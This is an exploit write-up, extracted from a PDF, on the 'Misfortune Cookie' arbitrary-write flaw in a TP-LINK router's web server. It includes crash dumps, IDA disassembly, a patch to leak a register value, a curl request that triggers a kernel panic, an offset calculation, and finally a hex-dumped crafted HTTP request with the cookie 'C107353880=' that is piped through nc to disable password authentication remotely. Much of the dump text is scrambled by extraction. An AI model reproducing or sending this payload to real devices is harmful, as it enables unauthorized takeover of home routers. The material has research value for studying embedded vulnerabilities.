Professional Documents
Culture Documents
Misfortune Cookie Demystified
Misfortune Cookie Demystified
| 2012/05/18
ATSE
ATTI(h,m,s)
ATDA(y,m,d)
ATDS
ATDT
ATDUx,y
ATRBx
ATRWx
ATRLx
ATGO(x)
ATGR
ATGT
ATRTw,x,y(,z)
ATSH
ATDOx,y
ATTD
ATUR
ATFLx
ATSTx
ATSYx
ATVDx
ATPNx
ATFEx,y,...
ATMP
ATDOx,y
9:
10:
11:
12:
13:
14:
15:
16:
17:
atgo bfc00000
Bootbase Version: VTC_SPI1.26 | 2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode
RAS Version: 1.0.0 Build 121121 Rel.08870
System
ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003
| 2012/05/18
0x00000000
0x00000001
0x8001FF80
0x804A9460
0x804A8A60
0x00000001
0x804A9E48
0x8040F004
$at=
$a1=
$t1=
$t5=
$s1=
$s5=
$t9=
$sp=
0x80350000
0x805D7AF8
0xFFFFFFFE
0x804A8A60
0x8040C114
0x8000007C
0x00000000
0x805E2B60
$v0=
$a2=
$t2=
$t6=
$s2=
$s6=
$k0=
$fp=
0x00000000
0xFFFFFFFF
0x804A8F38
0x804A9D00
0x805E2BC8
0x8040E5FC
0x00000000
0x805E2BC8
$v1=
$a3=
$t3=
$t7=
$s3=
$s7=
$k1=
$ra=
0x00000001
0x00000000
0x804A9E47
0x00000040
0x80042A70
0x00000000
0x8000007C
0x8003A3D0
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
805e2bc8:
805e2bd8:
805e2be8:
805e2bf8:
805e2c08:
805e2c18:
805e2c28:
...
...
805e2f68:
805e2f78:
805e2f88:
805e2f98:
805e2fa8:
805e2fb8:
805e2fc8:
80
80
80
80
80
80
00
5e
4e
55
5e
40
5e
00
2b
d5
54
2c
f8
2c
00
f8
ba
4c
18
ac
30
00
80
00
42
80
00
80
80
04
00
5f
10
00
10
16
2a
00
54
e5
00
d7
c4
70
00
4c
e0
00
38
28
80
80
42
80
80
80
80
4e
40
53
42
40
40
5e
d5
f8
00
64
e6
f8
2c
ba
ac
ba
dc
0c
ac
40
00
80
80
80
80
00
80
00
48
41
4e
10
00
10
00
4e
34
d5
dc
00
ec
01
29
0c
b9
c0
00
28
.^+...*p.N......
.N.......@...HN)
.UTLB_TLBS...A4.
.^,......Bd..N..
.@.......@......
.^,0...8.@......
.......(.^,@...(
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
................
................
................
................
................
................
................
current task
dump task
tx_stack_ptr
tx_stack_start
tx_stack_end
tx_stack_size
tx_run_count
00 01
= httpd
= network
= 0x805D5990
= 0x805D3AF0
= 0x805D5AEF
= 0x00002000
= 0x00000220
02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
805d5990: 00 00 00 00 80 5d 5a
805d59a0: 80 44 2c 8c 80 44 2c
805d59b0: 80 4a db 98 10 00 00
805d59c0: 80 1e cc ac 10 00 00
805d59d0: 00 00 00 00 00 00 05
805d59e0: 80 5d 5a 90 80 07 20
805d59f0: 00 00 00 00 00 00 00
805d5a00: 00 00 00 00 80 4d ac
805d5a10: c0 a8 01 90 00 00 00
805d5a20: 80 45 23 34 00 00 00
805d5a30: 00 00 00 00 00 00 00
805d5a40: 00 00 00 00 00 00 00
805d5a50: 10 00 00 01 80 4a db
...
...
Reserve for Print when Crash
Erasing 4K Sector...
70
90
01
01
dc
c8
00
88
01
14
00
00
98
80
80
00
00
00
80
00
80
80
00
00
00
00
44
44
00
00
00
45
00
52
5d
00
00
00
00
2b
2c
00
00
00
23
00
90
5a
00
00
00
00
f8
7c
0a
00
14
34
00
38
90
00
00
00
00
80
80
00
80
c0
00
00
00
80
00
00
c0
00
4a
44
00
51
a8
00
00
00
51
00
00
a8
00
db
2c
00
47
01
00
00
00
47
00
00
01
00
98
94
00
98
90
01
00
01
98
00
00
01
00
.....]Zp.D+..J..
.D,..D,..D,|.D,.
.J..............
.............QG.
................
.]Z... ..E#4....
................
.....M...R.8....
.........]Z..QG.
.E#4............
................
................
.....J..........
Erasing 4K Sector...
writeRomBlock(): Erase OK!
Well, the error is occured at httpd process and the program counter is at
0x8010E5D8. Let's check the details in ida pro.
ROM:8010E5B0 loc_8010E5B0:
# CODE XREF: sub_8010E574+ECj
ROM:8010E5B0
li
$t7, 0x43
# 0x43='C'
ROM:8010E5B4
bne
$v0, $t7, loc_8010E618
ROM:8010E5B8
li
$a1, 0x3D
ROM:8010E5BC
addiu
$s0, 1
ROM:8010E5C0
move
$a0, $s0
ROM:8010E5C4
jal
sub_8016C340
ROM:8010E5C8
nop
ROM:8010E5CC
move
$a0, $s0
ROM:8010E5D0
move
$s1, $v0
ROM:8010E5D4
addiu
$s1, 1
ROM:8010E5D8
jal
sub_801F2E74
ROM:8010E5DC
sb
$zero, -1($s1)
ROM:8010E5E0
move
$a0, $s1
ROM:8010E5E4
jal
sub_8016CA24
ROM:8010E5E8
move
$s3, $v0
ROM:8010E5EC
li
$a2, 0x28
ROM:8010E5F0
mul
$t2, $s3, $a2
ROM:8010E5F4
move
$a1, $s1
ROM:8010E5F8
addiu
$t5, $s4, 0x6B28
ROM:8010E5FC
move
$s0, $v0
ROM:8010E600
addu
$at, $s1, $s0
ROM:8010E604
addu
$a0, $t5, $t2
ROM:8010E608
jal
sub_8016A784
ROM:8010E60C
sb
$zero, 0($at)
ROM:8010E610
j
loc_8010E644
ROM:8010E614
addu
$s0, $s1, $s0
ROM:8010E618 #
--------------------------------------------------------------------------Excellent, it is exactly the codes being mentioned in [2]. It seems the syntax
Cxxx=yyy will be interpreted as xxx being multiplied with 0x28 at ROM:8010E5F0,
and sum the result with a base address being calculated at ROM:8010E5F8, and
use the new address as the destination address to copy yyy into it at ROM:8010E608.
Hence, it allows us to perform an arbitrary overwrite here. On the other hand,
it is possible to "unlock" the router with "sys pwauthen 0", as shown below.
cawan$ curl 192.168.1.1
<html>
<head>
<title>Protected Object</title></head><body>
<h1>Protected Object</h1>Username or Password error</body></html>
TP-LINK> sys pswauthen 0
Do not need password authentication for configuration!
TP-LINK>
cawan$ curl 192.168.1.1
<html>
<head>
<title>
</title><meta http-equiv="Content-Type" content="text/html; charset=
iso-8859-1">
<meta http-equiv=Content-Script-Type content=text/javascript>
<meta http-equiv=Content-Style-Type content=text/css>
</head><frameset rows="65,75,*" framespacing="0" border="0" frameborder="0">
<frame name="header" noresize src="status.html" marginwidth="0" marginheight="0">
| 2012/05/18
Excellent, it is definitely working in "unlock" mode right now. So, it is the time
to exploit the vulnerability remotely. By referring the code snippet of httpd again,
it seems we need to know the value of $s4 at ROM:8010E5F8 in order to calculate the
destination address of write operation at ROM:8010E608. We show the code snippet of
httpd again here.
ROM:8010E5B0 loc_8010E5B0:
# CODE XREF: sub_8010E574+ECj
ROM:8010E5B0
li
$t7, 0x43
# 0x43='C'
ROM:8010E5B4
bne
$v0, $t7, loc_8010E618
ROM:8010E5B8
li
$a1, 0x3D
ROM:8010E5BC
addiu
$s0, 1
ROM:8010E5C0
move
$a0, $s0
ROM:8010E5C4
jal
sub_8016C340
ROM:8010E5C8
nop
ROM:8010E5CC
move
$a0, $s0
ROM:8010E5D0
move
$s1, $v0
ROM:8010E5D4
addiu
$s1, 1
ROM:8010E5D8
jal
sub_801F2E74
ROM:8010E5DC
sb
$zero, -1($s1)
ROM:8010E5E0
move
$a0, $s1
ROM:8010E5E4
jal
sub_8016CA24
ROM:8010E5E8
move
$s3, $v0
ROM:8010E5EC
li
$a2, 0x28
ROM:8010E5F0
mul
$t2, $s3, $a2
ROM:8010E5F4
move
$a1, $s1
ROM:8010E5F8
addiu
$t5, $s4, 0x6B28 # $s4 = 0x8040F8AC
ROM:8010E5FC
move
$s0, $v0
ROM:8010E600
addu
$at, $s1, $s0
ROM:8010E604
addu
$a0, $t5, $t2
ROM:8010E608
jal
sub_8016A784
ROM:8010E60C
sb
$zero, 0($at)
ROM:8010E610
j
loc_8010E644
ROM:8010E614
addu
$s0, $s1, $s0
ROM:8010E618 #
--------------------------------------------------------------------------The problem right now is how to get the value of $s4 at ROM:8010E5F8 ?
Simple, just copy the content of $s4 into a rarely use register such as $s7 and
then trigger a "kernel panic" event immediately. Let's do it now. We are going
to change,
ROM:8010E5FC
ROM:8010E600
move
addu
$s0, $v0
$at, $s1, $s0
to
ROM:8010E5FC
ROM:8010E600
add
jr
$s7, $s4,$zero
$zero
=
=
0x0280b820
0x00000008
| 2012/05/18
istributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
Press ENTER to continue...
Erasing 4K Sector...
Erasing 4K Sector...
writeRomBlock(): Erase OK!
Well, simply issue a cookie to the router now, and it should "kernel panic"
immediately.
cawan$ curl --header 'Cookie: C9=9' 192.168.1.1
At UART port, we can see this immediately, :)
TLB refill exception occured!
EPC= 0x00000000
SR= 0x10000003
CR= 0x50805808
$RA= 0x80020000
Bad Virtual Address = 0x00000000
UTLB_TLBL ..\core\sys_isr.c:267 sysreset()
$r0=
$a0=
$t0=
$t4=
$s0=
$s4=
$t8=
$gp=
0x00000000
0x00000001
0x8001FF80
0x804A9460
0x804A8A60
0x00000001
0x804A9E48
0x8040F004
$at=
$a1=
$t1=
$t5=
$s1=
$s5=
$t9=
$sp=
0x80350000
0x805D7AF8
0xFFFFFFFE
0x804A8A60
0x8040C114
0x8000007C
0x00000000
0x805E2B60
$v0=
$a2=
$t2=
$t6=
$s2=
$s6=
$k0=
$fp=
0x00000000
0xFFFFFFFF
0x804A8F38
0x804A9D00
0x805E2BC8
0x8040E5FC
0x00000000
0x805E2BC8
$v1=
$a3=
$t3=
$t7=
$s3=
$s7=
$k1=
$ra=
0x00000001
0x00000000
0x804A9E47
0x00000040
0x80042A70
0x8040F8AC
0x8000007C
0x8003A3D0
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
805e2bc8:
805e2bd8:
805e2be8:
805e2bf8:
805e2c08:
805e2c18:
...
...
80
80
80
80
80
80
5e
4e
55
5e
40
5e
2b
fe
54
2c
f8
2c
f8
21
4c
18
ac
30
80
00
42
80
00
80
04
00
5f
10
00
10
2a
00
54
e5
00
d7
70
09
4c
ec
00
38
80
80
42
80
80
80
4e
40
4c
42
40
40
fe
f8
00
64
e6
f8
1e
ac
21
dc
0c
ac
80
80
80
80
80
00
4e
48
1f
4e
10
00
fe
4e
2e
fe
dc
00
20
29
88
1d
c0
00
.^+...*p.N...N.
.N.!.....@...HN)
.UTLB_TLBL.!....
.^,......Bd..N..
.@.......@......
.^,0...8.@......
Fine, the EPC is 0x00000000, as what we want it to be. Besides, the value of $s7
is 0x8040F8AC, which is the value of $s4 too, that we are looking for it.
Now, we know the value of $s4 is 0x8040F8AC, then the value of $t5 is 0x804163D4,
which is the base address of the calculation for destination address of write
operation. Since we need to overwrite 0x8034FF94 now, so
0x8034FF94 - 0x804163D4 = 0xFFF39BC0
<- Do it in Dword
0xFFF39BC0 % 0x28 = 0
<- Do it in Qword
<- Do it in Qword
0x06661718 = 107353880
Because the address 0x8034FF94 is exactly at the first byte of 0x28 bytes aligned
chunk,
then we can only overwrite the single byte with a null character (0x00). However, if
we
send the specially-crafted packet to the router by using curl, it is inappropriate
because curl will padding the header with 0x0d0a0d0a. Instead, it is better to send
the specially-crafted packet with nc. By defining a specially-craft packet properly
in a file, we can just pipe it into nc and send it over the router to "unlock" the
router remotely. Let's do it now.
cawan$ cat ./cawan_header | xxd
0000000: 4745 5420 2f20 4854 5450
0000010: 7365 722d 4167 656e 743a
0000020: 372e 3333 2e30 0a48 6f73
0000030: 2e31 3638 2e31 2e31 0a41
0000040: 202a 2f2a 0a43 6f6f 6b69
0000050: 3733 3533 3838 303d 000a
2f31
2063
743a
6363
653a
2e31
7572
2031
6570
2043
0a55
6c2f
3932
743a
3130
GET / HTTP/1.1.U
ser-Agent: curl/
7.33.0.Host: 192
.168.1.1.Accept:
*/*.Cookie: C10
7353880=..